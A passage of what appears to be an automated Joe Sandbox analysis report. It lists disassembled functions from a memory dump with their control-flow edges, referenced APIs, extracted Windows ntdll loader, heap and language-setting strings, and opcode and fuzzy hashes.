333d9859-333d985c 677->679 678->646 685 333d9866 678->685 679->635 684->638 685->635 690 333d95dd-333d960b RtlDebugPrintTimes 686->690 687->690 689->612 690->561 694 333d9611-333d9617 690->694 692->647 694->617
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $ $0
                                                                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                                                                • Opcode ID: f548a9c7ac8aa558fd1ba4fa3db8858263a40421fd50b1a830297813aa4dc36a
                                                                                                                                                                                • Instruction ID: bfa384ca2a2fd5e3e4afac86f04b8b367518c150807af0f64d921fafaed4c152
                                                                                                                                                                                • Opcode Fuzzy Hash: f548a9c7ac8aa558fd1ba4fa3db8858263a40421fd50b1a830297813aa4dc36a
                                                                                                                                                                                • Instruction Fuzzy Hash: B73235B6A083818FE350CF68C884B5BBBE9BF88744F04892EF599C7250D775D949CB52
                                                                                                                                                                                Function 33368540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 765 33368540-333685a1 766 333685a7-333685b8 765->766 767 333a50a2-333a50a8 765->767 767->766 768 333a50ae-333a50bb GetPEB 767->768 768->766 769 333a50c1-333a50c4 768->769 770 333a50e1-333a5107 call 33372c00 769->770 771 333a50c6-333a50d0 769->771 770->766 776 333a510d-333a5111 770->776 771->766 772 333a50d6-333a50df 771->772 774 333a5138-333a514c call 333353c0 772->774 781 333a5152-333a515e 774->781 776->766 778 333a5117-333a512c call 33372c00 776->778 778->766 785 333a5132 778->785 783 333a5367-333a5373 call 333a5378 781->783 784 333a5164-333a5178 781->784 783->766 787 333a517a 784->787 788 333a5196-333a520c 784->788 785->774 789 333a517c-333a5183 787->789 793 333a520e-333a5240 call 3332fcf0 788->793 794 333a5245-333a5248 788->794 789->788 792 333a5185-333a5187 789->792 795 333a5189-333a518c 792->795 796 333a518e-333a5190 792->796 805 333a5358-333a535d call 333ba130 793->805 798 333a524e-333a529f 794->798 799 333a531f-333a5322 794->799 795->789 796->788 800 333a5360-333a5362 796->800 806 333a52d9-333a531d call 3332fcf0 * 2 798->806 807 333a52a1-333a52d7 call 3332fcf0 798->807 799->800 801 333a5324-333a5353 call 3332fcf0 799->801 800->781 801->805 805->800 806->805 807->805
                                                                                                                                                                                Strings
                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333A5215, 333A52A1, 333A5324
                                                                                                                                                                                • 8, xrefs: 333A50EE
                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333A52D9
                                                                                                                                                                                • corrupted critical section, xrefs: 333A52CD
                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 333A5236
                                                                                                                                                                                • Critical section address., xrefs: 333A530D
                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 333A52C1
                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333A52ED
                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 333A534E
                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 333A52B9, 333A5305
                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 333A5313
                                                                                                                                                                                • Critical section debug info address, xrefs: 333A522A, 333A5339
                                                                                                                                                                                • Thread identifier, xrefs: 333A5345
                                                                                                                                                                                • Critical section address, xrefs: 333A5230, 333A52C7, 333A533F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                • Opcode ID: f001c8b754fda4f5b88a9e2ee0c112db02532d7e77ae182a9287d0df0fc33be4
                                                                                                                                                                                • Instruction ID: 3c00e0cacbd4c77cc73287e111ea269ce7712ac63efce427e97925ec2037c0ed
                                                                                                                                                                                • Opcode Fuzzy Hash: f001c8b754fda4f5b88a9e2ee0c112db02532d7e77ae182a9287d0df0fc33be4
                                                                                                                                                                                • Instruction Fuzzy Hash: 54819DB5D02318AFEB10CF98CC80B9EBBB9FF48715F148159E954BB281C7B8A941CB54
                                                                                                                                                                                Function 3332D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.53
                                                                                                                                                                                • API String ID: 0-1130328624
                                                                                                                                                                                • Opcode ID: 2db0ad90013366ef80b6796ad1ed53181fad8f7d80edc337438be169a7242beb
                                                                                                                                                                                • Instruction ID: 542fe4b5537ce53dbd74694ab5236ede21bc159af3769cff7ff5d0ed12607f8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 2db0ad90013366ef80b6796ad1ed53181fad8f7d80edc337438be169a7242beb
                                                                                                                                                                                • Instruction Fuzzy Hash: 74B19EB69093419FD711CF24C880B6FBBE8AF88754F45892EF9A4D7240DB74D948CB92
                                                                                                                                                                                Function 333D86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                • Opcode ID: d0c979cb45396c9bca62290eb77d8e98395110b4981914f1d449971226c40c1e
                                                                                                                                                                                • Instruction ID: 46220305df4e51df49dc30623c04892ab06b68f450d0d065c9124580e3d86350
                                                                                                                                                                                • Opcode Fuzzy Hash: d0c979cb45396c9bca62290eb77d8e98395110b4981914f1d449971226c40c1e
                                                                                                                                                                                • Instruction Fuzzy Hash: DA519DB69043119BD315DF18CC80AABB7ECEB84351F048A1DF999CB150E774E605CB92
                                                                                                                                                                                Function 333DF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                • API String ID: 3446177414-1745908468
                                                                                                                                                                                • Opcode ID: 01f46edb7e94530a23ddb37e8c679979af8a879a0c694202b60ff079f223df76
                                                                                                                                                                                • Instruction ID: f7722536e8a476c523406b6a0db7b3f261b51092b439dbe201eb80b3dc893b59
                                                                                                                                                                                • Opcode Fuzzy Hash: 01f46edb7e94530a23ddb37e8c679979af8a879a0c694202b60ff079f223df76
                                                                                                                                                                                • Instruction Fuzzy Hash: 1791EE7AD00744DFDB02DFA8C890AADBBF2FF49710F18C259E455ABA52CB759941CB10
                                                                                                                                                                                Function 3332D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3332D06F
                                                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3332D0E6
                                                                                                                                                                                • h.53, xrefs: 3338A5D2
                                                                                                                                                                                • @, xrefs: 3332D24F
                                                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3332D202
                                                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 3332D136
                                                                                                                                                                                • @, xrefs: 3332D09D
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3332D263
                                                                                                                                                                                • @, xrefs: 3332D2B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.53
                                                                                                                                                                                • API String ID: 0-2331986510
                                                                                                                                                                                • Opcode ID: 2fe049835602204fe64ea2294325d7a9328fd7eb3561fa4144d856dba41f0ea6
                                                                                                                                                                                • Instruction ID: e3d1e25024cff13e5d17221b44edd4d96e3e6e8b865e445b919800c2e9a6eb3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fe049835602204fe64ea2294325d7a9328fd7eb3561fa4144d856dba41f0ea6
                                                                                                                                                                                • Instruction Fuzzy Hash: A9A13DB19093459FE361CF14C880B9BBBE8BF84755F00892EF599D6640EB78D948CF92
                                                                                                                                                                                Function 3335D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3335D879
                                                                                                                                                                                  • Part of subcall function 33334779: RtlDebugPrintTimes.NTDLL ref: 33334817
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                • Opcode ID: 883a8a79fd5c29ae611e8e74a7d21c0d0223467c45d71a6175e0ed90a58485ad
                                                                                                                                                                                • Instruction ID: 64eeb1b5d80cc8b11e36ed4c6b6f496a1eecb29b86b4dbe96208853449017428
                                                                                                                                                                                • Opcode Fuzzy Hash: 883a8a79fd5c29ae611e8e74a7d21c0d0223467c45d71a6175e0ed90a58485ad
                                                                                                                                                                                • Instruction Fuzzy Hash: EF51DC75E443459FEB04DFA4C884BADBBF1BF44714F28C159E800BB691DB74A986CB80
                                                                                                                                                                                Function 333DF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                                                                • Opcode ID: 3f45c31bf91b0d3248d75273ba0badb6387b49b63970b73ea02690bd988fa49f
                                                                                                                                                                                • Instruction ID: 76f03bd11a949e233925a25f9428ff0aea9c9986fb85715a2d73a6b98235ac0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f45c31bf91b0d3248d75273ba0badb6387b49b63970b73ea02690bd988fa49f
                                                                                                                                                                                • Instruction Fuzzy Hash: DB51F377916344EFD701CFA4C8E4E5ABBA8EF04AA4F14C599F401EBA62CA75DA50CE10
                                                                                                                                                                                Function 333B8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 333B86E7
                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 333B880F
                                                                                                                                                                                • VerifierDlls, xrefs: 333B893D
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 333B86BD
                                                                                                                                                                                • VerifierDebug, xrefs: 333B8925
                                                                                                                                                                                • HandleTraces, xrefs: 333B890F
                                                                                                                                                                                • VerifierFlags, xrefs: 333B88D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                • Opcode ID: 439fce3faad95d7ac558cce946e5a17b44e323d744728d3265e8544f7a5a2121
                                                                                                                                                                                • Instruction ID: 67e74919c6b46f1688c7e0952588d28e7ac69cc6ee6a5c745f5448dcbc4626d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 439fce3faad95d7ac558cce946e5a17b44e323d744728d3265e8544f7a5a2121
                                                                                                                                                                                • Instruction Fuzzy Hash: 29910171D41391AFEB11EF24C880B1AB7F8EB40A55F458998F980FFA91C7309805CB96
                                                                                                                                                                                Function 3335237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 3339A7A5
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3339A7AF
                                                                                                                                                                                • DG03, xrefs: 33352382
                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3339A79F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DG03$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-3833620374
                                                                                                                                                                                • Opcode ID: e4b4d6cacc76c0b8983e8c29c7f5fdc4a8859a92fd11a4efe07fdacb4c96da66
                                                                                                                                                                                • Instruction ID: 4572b28185be2e12c6cb69b1685e17abdc053d78612ece2a570abe8b1532a9aa
                                                                                                                                                                                • Opcode Fuzzy Hash: e4b4d6cacc76c0b8983e8c29c7f5fdc4a8859a92fd11a4efe07fdacb4c96da66
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A31C076E45200EFF714EF59CC81B9A7BF9EB90B50F188199F810F7251EBB099428B50
                                                                                                                                                                                Function 3332F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                                                • Opcode ID: 61a675fc75e01b9716966a50bf9f255089393a775f22d478578507d4c542aa6f
                                                                                                                                                                                • Instruction ID: 58a61d8781b608a109c4bf41d3446f098d16fea4dbf438ce089c92ffd508e547
                                                                                                                                                                                • Opcode Fuzzy Hash: 61a675fc75e01b9716966a50bf9f255089393a775f22d478578507d4c542aa6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F42FF75A087819FD305CF28C880A2ABBE9FF84744F48CA6DE485CB751DB34E949CB52
                                                                                                                                                                                Function 3335510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.53
                                                                                                                                                                                • API String ID: 0-2616635974
                                                                                                                                                                                • Opcode ID: 8ef697888c9916384cacc6d1de2cfe5bb624d47564298b4e412cbdf05732d7f1
                                                                                                                                                                                • Instruction ID: b52e5ed69a572fdd92a1503ac832d0adaf2fe2f87f79d535cfd58a88df830062
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ef697888c9916384cacc6d1de2cfe5bb624d47564298b4e412cbdf05732d7f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F13CB6D51219EFEB01CF99C980EDEBBFCEF08650F55805AE505E7610EB74AE018B90
                                                                                                                                                                                Function 3334B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                                                • Opcode ID: 05532d1c3e87a04de2b5a3529f29f1d311c7580964d7c273f5fda5c76315447d
                                                                                                                                                                                • Instruction ID: 5ad463a9ed56564c43e26c00af7474770091576c0d4b84dc4fac226cc5e5882b
                                                                                                                                                                                • Opcode Fuzzy Hash: 05532d1c3e87a04de2b5a3529f29f1d311c7580964d7c273f5fda5c76315447d
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC10375E05315ABEB048F64CC91BBE77E9EF85744F58C169E892EF290EB748844C390
                                                                                                                                                                                Function 3336631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                • Opcode ID: aad116edf08d8997c4047ef8fcb8e3548b26435d73ce05c8777c9501e7775fa7
                                                                                                                                                                                • Instruction ID: 3b7b0b532bc644554a676209f2f0f2c191d45e0e23fb711854b76a3363b2e0d9
                                                                                                                                                                                • Opcode Fuzzy Hash: aad116edf08d8997c4047ef8fcb8e3548b26435d73ce05c8777c9501e7775fa7
                                                                                                                                                                                • Instruction Fuzzy Hash: 93914770E863149FEB14DF18CC84B59BBE4EF80BA4F14C168E900FB691DB789841CB91
                                                                                                                                                                                Function 33362594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 333A1FA9
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 333A1F8A
                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 333A1F6A, 333A1FA4, 333A1FC4
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 333A1F6F
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 333A1FC9
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 333A1F82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                • Opcode ID: fd0ef7bfd6768d44c81e8b221c38813734fead6fb8ecae43c0491b8d3b049094
                                                                                                                                                                                • Instruction ID: f07d268724ddec28646fccb2f9198855af55e16f5d55fafe811427ab6686e95f
